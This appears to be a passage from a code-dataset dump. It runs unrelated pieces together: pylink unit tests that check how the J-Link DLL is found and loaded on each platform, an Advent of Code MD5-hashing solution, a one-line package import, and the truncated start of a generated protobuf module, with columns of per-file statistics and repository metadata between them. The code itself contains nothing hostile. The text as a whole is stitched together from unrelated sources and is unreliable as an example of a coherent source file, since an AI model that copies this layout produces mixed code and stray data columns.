mock_load_library.assert_called_once()
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('os.path.isdir')
def test_initialiaze_no(self, mock_isdir, mock_load_library, mock_find_library, mock_open):
"""Tests creating a library when the default DLL does not exist.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_isdir (Mock): mock for mocking the call to ``os.path.isdir``
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the clal to ``open()``
Returns:
``None``
"""
mock_isdir.return_value = False
mock_find_library.return_value = None
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(0, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_initialize_with_path(self, mock_load_library, mock_find_library, mock_open):
"""Tests creating a library when passing in a DLL path.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
lib = library.Library(self.lib_path)
lib.unload = mock.Mock()
self.assertEqual(0, mock_find_library.call_count)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_load_library.assert_called_once()
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
def test_initialize_windows(self, mock_ctypes, mock_find_library, mock_open):
"""Tests creating a library on a Windows machine.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_ctypes (Mock): a mocked version of the ctypes library
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_windll = mock.Mock()
mock_windll.__getitem__ = mock.Mock()
mock_cdll = mock.Mock()
mock_cdll.__getitem__ = mock.Mock()
mock_ctypes.windll = mock_windll
mock_ctypes.cdll = mock_cdll
mock_find_library.return_value = self.lib_path
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_cdll.LoadLibrary.assert_called_once()
mock_windll.LoadLibrary.assert_called_once()
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_load(self, mock_load_library, mock_find_library, mock_open):
"""Tests that we can pass in a path to a DLL to load.
If the path is valid, loads the given ``DLL``, otherwise stays the
same.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = self.lib_path
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
mock_open.assert_called_with(self.lib_path, 'rb')
self.assertEqual(1, mock_load_library.call_count)
new_path = '\\'
lib.load(new_path)
mock_open.assert_called_with(new_path, 'rb')
self.assertEqual(2, mock_load_library.call_count)
lib.load(None)
mock_open.assert_called_with(new_path, 'rb')
self.assertEqual(3, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('pylink.library.open', new=mock.MagicMock())
@mock.patch('pylink.library.ctypes')
@mock.patch('os.remove')
def test_unload_no_library(self, mock_remove, mock_ctypes):
"""Tests unloading the library when no DLL is loaded.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_remove (Mock): the mocked call to ``os.remove()``
mock_ctypes (Mock): mocked ``ctypes`` module
Returns:
``None``
"""
lib = library.Library('')
setattr(lib, '_lib', None)
setattr(lib, '_temp', None)
self.assertFalse(lib.unload())
mock_remove.assert_not_called()
@mock.patch('sys.platform', new='windows')
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('pylink.library.open', new=mock.MagicMock())
@mock.patch('pylink.library.ctypes')
@mock.patch('os.remove')
def test_unload_windows(self, mock_remove, mock_ctypes):
"""Tests unloading the library on Windows.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_remove (Mock): the mocked call to ``os.remove()``
mock_ctypes (Mock): mocked ``ctypes`` module
Returns:
``None``
"""
lib = library.Library('')
self.assertTrue(lib.unload())
self.assertEqual(2, mock_ctypes.windll.kernel32.FreeLibrary.call_count)
mock_remove.assert_called_once()
@mock.patch('sys.platform', new='darwin')
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('pylink.library.open', new=mock.MagicMock())
@mock.patch('pylink.library.ctypes')
@mock.patch('os.remove')
def test_unload_darwin_linux(self, mock_remove, mock_ctypes):
"""Tests unloading the library on Darwin and Linux platforms.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_remove (Mock): the mocked call to ``os.remove()``
mock_ctypes (Mock): mocked ``ctypes`` module
Returns:
``None``
"""
lib = library.Library('')
self.assertTrue(lib.unload())
mock_remove.assert_called_once()
self.assertEqual(None, lib._lib)
self.assertEqual(None, lib._temp)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
def test_dll_getter(self, mock_load_library, mock_find_library, mock_open):
"""Tests that the ``.dll()`` getter returns the set ``DLL``.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): mock for mocking the
``ctypes.util.find_library()`` call
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = self.lib_path
mock_load_library.return_value = 0xDEADBEEF
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
mock_open.assert_called_with(self.lib_path, 'rb')
mock_load_library.assert_called_once()
self.assertEqual(0xDEADBEEF, lib.dll())
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_4_98_e(self, mock_os, mock_load_library, mock_find_library, mock_open):
"""Tests finding the DLL on Darwin through the SEGGER application for V4.98E-.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/Applications/SEGGER/JLink 1/libjlinkarm.dylib'
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_5_0_0(self, mock_os, mock_load_library, mock_find_library, mock_open):
"""Tests finding the DLL on Darwin through the SEGGER application for V5.0.0+.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/Applications/SEGGER/JLink/libjlinkarm.5.12.10.dylib',
'/Applications/SEGGER/JLink/libjlinkarm.5.dylib'
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_6_0_0(self, mock_os, mock_load_library, mock_find_library, mock_open):
"""Tests finding the DLL on Darwin through the SEGGER application for V6.0.0+.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/Applications/SEGGER/JLink/libjlinkarm.dylib'
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='darwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_darwin_empty(self, mock_os, mock_load_library, mock_find_library, mock_open):
"""Tests finding the DLL on Darwin through the SEGGER application for V6.0.0+.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/Applications/SEGGER/JLink/'
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(0, mock_load_library.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_4_98_e(self, mock_os, mock_ctypes, mock_find_library, mock_open):
"""Tests finding the DLL on Windows through the SEGGER application for V4.98E-.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_ctypes (Mock): a mocked version of the ctypes library
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_windll = mock.Mock()
mock_windll.__getitem__ = mock.Mock()
mock_cdll = mock.Mock()
mock_cdll.__getitem__ = mock.Mock()
mock_ctypes.windll = mock_windll
mock_ctypes.cdll = mock_cdll
mock_find_library.return_value = None
directories = [
'C:\\Program Files\\SEGGER\\JLink_V49e\\JLinkARM.dll'
]
self.mock_directories(mock_os, directories, '\\')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_windll.LoadLibrary.call_count)
self.assertEqual(1, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_5_10_0(self, mock_os, mock_ctypes, mock_find_library, mock_open):
"""Tests finding the DLL on Windows through the SEGGER application for V5.0.0+.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_ctypes (Mock): a mocked version of the ctypes library
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_windll = mock.Mock()
mock_windll.__getitem__ = mock.Mock()
mock_cdll = mock.Mock()
mock_cdll.__getitem__ = mock.Mock()
mock_ctypes.windll = mock_windll
mock_ctypes.cdll = mock_cdll
mock_find_library.return_value = None
directories = [
'C:\\Program Files (x86)\\SEGGER\\JLink_V510l\\JLinkARM.dll'
]
self.mock_directories(mock_os, directories, '\\')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_windll.LoadLibrary.call_count)
self.assertEqual(1, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_jlinkarm(self, mock_os, mock_ctypes, mock_find_library, mock_open):
"""Tests finding the DLL on Windows through the SEGGER JLinkARM folder.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_ctypes (Mock): a mocked version of the ctypes library
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_windll = mock.Mock()
mock_windll.__getitem__ = mock.Mock()
mock_cdll = mock.Mock()
mock_cdll.__getitem__ = mock.Mock()
mock_ctypes.windll = mock_windll
mock_ctypes.cdll = mock_cdll
mock_find_library.return_value = None
directories = [
'C:\\Program Files (x86)\\SEGGER\\JLinkARM\\JLinkARM.dll'
]
self.mock_directories(mock_os, directories, '\\')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_windll.LoadLibrary.call_count)
self.assertEqual(1, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='windows')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('pylink.library.ctypes')
@mock.patch('pylink.library.os')
def test_windows_empty(self, mock_os, mock_ctypes, mock_find_library, mock_open):
"""Tests finding the DLL on Windows through the SEGGER application for V6.0.0+.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_ctypes (Mock): a mocked version of the ctypes library
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open``
Returns:
``None``
"""
mock_windll = mock.Mock()
mock_windll.__getitem__ = mock.Mock()
mock_cdll = mock.Mock()
mock_cdll.__getitem__ = mock.Mock()
mock_ctypes.windll = mock_windll
mock_ctypes.cdll = mock_cdll
mock_find_library.return_value = None
directories = [
'C:\\Program Files\\',
'C:\\Program Files (x86)\\'
]
self.mock_directories(mock_os, directories, '\\')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(0, mock_windll.LoadLibrary.call_count)
self.assertEqual(0, mock_cdll.LoadLibrary.call_count)
@mock.patch('sys.platform', new='cygwin')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_cygwin(self, mock_os, mock_load_library, mock_find_library, mock_open):
"""Tests finding the DLL when running within Cygwin.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'C:\\Program Files (x86)\\SEGGER\\JLinkARM\\JLinkARM.dll',
'C:\\Program Files (x86)\\SEGGER\\JLink_V500l\\JLinkARM.dll'
]
self.mock_directories(mock_os, directories, '\\')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='linux')
@mock.patch('pylink.util.is_os_64bit', return_value=False)
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_4_98_e(self, mock_os, mock_load_library, mock_find_library, mock_open, mock_is_os_64bit):
"""Tests finding the DLL on Linux through the SEGGER application for V4.98E-.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/opt/SEGGER/JLink_Linux_V498e_i386/libjlinkarm.so',
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
load_library_args, load_libary_kwargs = mock_load_library.call_args
self.assertEqual(directories[0], lib._path)
@mock.patch('sys.platform', new='linux2')
@mock.patch('pylink.util.is_os_64bit', return_value=False)
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_6_10_0_32bit(self, mock_os, mock_load_library, mock_find_library, mock_open, mock_is_os_64bit):
"""Tests finding the DLL on Linux through the SEGGER application for V6.0.0+ on 32 bit linux.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
mock_is_os_64bit (Mock): mock for mocking the call to ``is_os_64bit``, returns False
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm_x86.so.6.10',
'/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm.so.6.10',
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
load_library_args, load_libary_kwargs = mock_load_library.call_args
self.assertEqual(directories[0], lib._path)
directories = [
'/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm.so.6.10',
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
load_library_args, load_libary_kwargs = mock_load_library.call_args
self.assertEqual(None, lib._path)
@mock.patch('sys.platform', new='linux2')
@mock.patch('pylink.util.is_os_64bit', return_value=True)
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_6_10_0_64bit(self, mock_os, mock_load_library, mock_find_library, mock_open, mock_is_os_64bit):
"""Tests finding the DLL on Linux through the SEGGER application for V6.0.0+ on 64 bit linux.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
mock_is_os_64bit (Mock): mock for mocking the call to ``is_os_64bit``, returns True
Returns:
``None``
"""
mock_find_library.return_value = None
directories = [
'/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm_x86.so.6.10',
'/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm.so.6.10',
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
load_library_args, load_libary_kwargs = mock_load_library.call_args
self.assertEqual(directories[1], lib._path)
directories = [
'/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm_x86.so.6.10',
]
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
self.assertEqual(None, lib._path)
@mock.patch('sys.platform', new='linux')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_empty(self, mock_os, mock_load_library, mock_find_library, mock_open):
"""Tests finding the DLL on Linux through the SEGGER application for V6.0.0+.
Args:
self (TestLibrary): the ``TestLibrary`` instance
mock_os (Mock): a mocked version of the ``os`` module
mock_load_library (Mock): a mocked version of the library loader
mock_find_library (Mock): a mocked call to ``ctypes`` find library
mock_open (Mock): mock for mocking the call to ``open()``
Returns:
``None``
"""
mock_find_library.return_value = None
directories = []
self.mock_directories(mock_os, directories, '/')
lib = library.Library()
lib.unload = mock.Mock()
mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
self.assertEqual(1, mock_find_library.call_count)
self.assertEqual(0, mock_load_library.call_count)
if __name__ == '__main__':
unittest.main()
| 37.496711
| 114
| 0.638945
| 4,320
| 34,197
| 4.857407
| 0.060648
| 0.070911
| 0.061475
| 0.045082
| 0.868328
| 0.857177
| 0.852078
| 0.844548
| 0.832634
| 0.823103
| 0
| 0.009163
| 0.24043
| 34,197
| 911
| 115
| 37.53787
| 0.798691
| 0.28716
| 0
| 0.727468
| 0
| 0
| 0.17308
| 0.106737
| 0
| 0
| 0.000892
| 0
| 0.16309
| 1
| 0.064378
| false
| 0.002146
| 0.008584
| 0
| 0.094421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71085555d6931b7d2453196fa6d9288951c256f0
| 513
|
py
|
Python
|
2015/4.py
|
mathstrains21/Advent-Of-Code
|
c4a5365ecea87a9dfe52d936cbf80cac26f4ae8f
|
[
"MIT"
] | 3
|
2021-11-21T07:41:05.000Z
|
2021-11-22T02:47:59.000Z
|
2015/4.py
|
mathstrains21/Advent-Of-Code
|
c4a5365ecea87a9dfe52d936cbf80cac26f4ae8f
|
[
"MIT"
] | 2
|
2021-12-04T10:17:55.000Z
|
2021-12-04T10:21:31.000Z
|
2015/4.py
|
mathstrains21/Advent-Of-Code
|
c4a5365ecea87a9dfe52d936cbf80cac26f4ae8f
|
[
"MIT"
] | null | null | null |
import hashlib
def execute1(puzzle_input):
number = 0
while True:
number += 1
if (
hashlib.md5(f"{puzzle_input}{number}".encode())
.hexdigest()
.startswith("0" * 5)
):
return number
def execute2(puzzle_input):
number = 0
while True:
number += 1
if (
hashlib.md5(f"{puzzle_input}{number}".encode())
.hexdigest()
.startswith("0" * 6)
):
return number
| 19.730769
| 59
| 0.477583
| 50
| 513
| 4.82
| 0.42
| 0.182573
| 0.282158
| 0.149378
| 0.746888
| 0.746888
| 0.746888
| 0.746888
| 0.746888
| 0.746888
| 0
| 0.039088
| 0.401559
| 513
| 25
| 60
| 20.52
| 0.745928
| 0
| 0
| 0.761905
| 0
| 0
| 0.089669
| 0.08577
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
855ee2284dacbf09b67db3a646386d81803cb9de
| 22
|
py
|
Python
|
magma/passes/__init__.py
|
David-Durst/magma
|
425788b66c948a400d58dced3a40b9be596d4448
|
[
"MIT"
] | null | null | null |
magma/passes/__init__.py
|
David-Durst/magma
|
425788b66c948a400d58dced3a40b9be596d4448
|
[
"MIT"
] | null | null | null |
magma/passes/__init__.py
|
David-Durst/magma
|
425788b66c948a400d58dced3a40b9be596d4448
|
[
"MIT"
] | null | null | null |
from .passes import *
| 11
| 21
| 0.727273
| 3
| 22
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
85b1d5c705d490439856ace16e13b158c20ed652
| 19,467
|
py
|
Python
|
python/candig/schemas/candig/bio_metadata_pb2.py
|
ljdursi/ga4gh-schemas
|
8255e66d247e65688d0b5320173340f3eb52ce7c
|
[
"Apache-2.0"
] | 1
|
2019-12-06T14:06:37.000Z
|
2019-12-06T14:06:37.000Z
|
python/candig/schemas/candig/bio_metadata_pb2.py
|
ljdursi/ga4gh-schemas
|
8255e66d247e65688d0b5320173340f3eb52ce7c
|
[
"Apache-2.0"
] | 9
|
2019-03-25T22:35:49.000Z
|
2019-12-16T22:02:14.000Z
|
python/candig/schemas/candig/bio_metadata_pb2.py
|
ljdursi/ga4gh-schemas
|
8255e66d247e65688d0b5320173340f3eb52ce7c
|
[
"Apache-2.0"
] | 1
|
2017-12-04T17:29:14.000Z
|
2017-12-04T17:29:14.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: candig/schemas/candig/bio_metadata.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from candig.schemas.candig import common_pb2 as candig_dot_schemas_dot_candig_dot_common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='candig/schemas/candig/bio_metadata.proto',
package='candig.schemas.candig',
syntax='proto3',
serialized_pb=_b('\n(candig/schemas/candig/bio_metadata.proto\x12\x15\x63\x61ndig.schemas.candig\x1a\"candig/schemas/candig/common.proto\"\xc5\x04\n\nIndividual\x12\n\n\x02id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t\x12\x0f\n\x07\x63reated\x18\x05 \x01(\t\x12\x0f\n\x07updated\x18\x06 \x01(\t\x12\x34\n\x07species\x18\x07 \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x30\n\x03sex\x18\x08 \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x35\n\nattributes\x18\n \x01(\x0b\x32!.candig.schemas.candig.Attributes\x12\x12\n\npatient_id\x18\x0b \x01(\t\x12!\n\x19regional_profiling_centre\x18\x0c \x01(\t\x12\x36\n\tdiagnosis\x18\r \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x16\n\x0epathology_type\x18\x0e \x01(\t\x12 \n\x18\x65nrollment_approval_date\x18\x0f \x01(\t\x12$\n\x1c\x65nrollment_approval_initials\x18\x10 \x01(\t\x12\x1e\n\x16\x64\x61te_of_upload_to_sFTP\x18\x11 